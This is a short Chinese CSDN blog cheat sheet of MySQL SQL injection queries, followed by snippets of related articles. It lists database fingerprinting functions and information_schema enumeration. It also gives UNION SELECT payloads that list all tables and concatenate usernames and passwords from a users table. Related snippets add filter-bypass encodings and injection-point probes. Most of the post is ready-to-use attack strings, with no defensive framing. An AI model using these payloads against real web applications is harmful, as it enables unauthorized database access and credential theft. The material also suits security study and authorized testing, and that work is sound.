SQL注入常用查询语句

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量2k 收藏 5
点赞数
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012991692/article/details/80784201
版权

DB用户user()

DB版本version()

全局函数@@datadir@@hostname

 @@VERSION@@version_compile_os

 当前库database()

•        ASCII转字符char()

•        连接字符串CONCAT_WS(CHAR(32,58,32),user(),database(),version())

 

table_schema 数据库名

information_schema.tables  数据库表数据

table_name  表名

 

information_schema.columns   数据库列数据

column_name    列名

 

所有库所有表/ 统计每个库中表的数量

 

•        ‘union select table_name,table_schema from information_schema.tables--+

•        'UNION select table_schema,count(*) FROM information_Schema.tables group bytable_schema --

 

在一个字段中同时查出多个数据,并用冒号隔开:

        'union select null, concat(user,0x3a,password) from users--+

 

 

于尘世中迷途小书童
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5835
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
Web渗透-MySql-Sql注入:联合查询注入
最新发布
WolvenSec的博客
05-29 1268
SQL注入(SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6218
渗透测试-SQL注入之核心语法获取数据库信息
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
常见SQL注入手法
weixin_57048716的博客
11-26 1645
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
手工注入常用SQL语句.txt
07-18
手工注入常用SQL语句
手工SQL注入常用SQL语句
06-05
手工sql注入的一些常用语句,适合初学的时候看
日常收集常用SQL查询语句大全
12-15
常用sql查询语句如下所示: 一、简单查询语句 1. 查看表结构 SQL>DESC emp; 2. 查询所有列 SQL>SELECT * FROM emp; 3. 查询指定列 SQL>SELECT empmo, ename, mgr FROM emp; SQL>SELECT DISTINCT mgr FROM emp; 只...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
SQL注入各种注入方式
震山的博客
10-11 971
当时学 Sql 注入各种方式的学习笔记
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 常用Sql注入语句 常用Sql注入语句
SQL注入查询方式及盲注)
qi_SJQ_的博客
11-09 1586
很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作。 sql语句增删改查: 比如:insert注入可以用于用户注册时插入到数据库中。 ...
常见的SQL注入类型
weixin_49182737的博客
05-22 1万+
sql注入的基本分类
常用sql注入语句
hey
08-19 1万+
首先,看看SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上; Out-of-band:数据通过不同于SQL代码注入的方法获得(譬如通过邮件等) 推理:这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。 不论是...
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
SQL注入语句和方法总结
叮当大猫猫
09-29 6660
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
SQL注入速查表
ww564的博客
11-09 380
过滤and or 十六进制绕过 or ——> o\x72 大小写绕过 Or aNd 双写绕过 oorr anandd urlencode,ascii(char),hex,unicode编码绕过 一些unicode编码举例: 单引号:' %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 关键字内联注释尝试绕所有 /*!or*/ /*!and*/ 左括号过滤 urlencode,ascii(char),hex,unicod
SQL注入-注入点判断
渗透笔记
01-11 2万+
1.注入点判断 传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone" 判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入 其他类型 构造测试 预期结果
手工sql注入常用sql语句
05-10
以下是一些常用的手工SQL注入语句: 1. 获取当前数据库的名称: ``` SELECT database(); ``` 2. 获取当前用户: ``` SELECT user(); ``` 3. 获取当前版本号: ``` SELECT version(); ``` 4. 获取所有数据库的名称: ``` SELECT schema_name FROM information_schema.schemata; ``` 5. 获取当前数据库中所有表的名称: ``` SELECT table_name FROM information_schema.tables WHERE table_schema = database(); ``` 6. 获取当前表的列信息: ``` SELECT column_name, data_type FROM information_schema.columns WHERE table_name = '表名'; ``` 7. 获取当前表的数据: ``` SELECT * FROM 表名; ``` 8. 获取当前表中第一行数据: ``` SELECT * FROM 表名 LIMIT 1; ``` 9. 获取当前表中前n行数据: ``` SELECT * FROM 表名 LIMIT n; ``` 10. 插入一条数据: ``` INSERT INTO 表名 (列1, 列2, 列3) VALUES ('值1', '值2', '值3'); ``` 以上仅为一些常用的手工SQL注入语句,具体使用时需要根据实际情况进行调整。同时,需要注意的是,手工SQL注入可能会对数据库造成损害,使用时需要谨慎。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值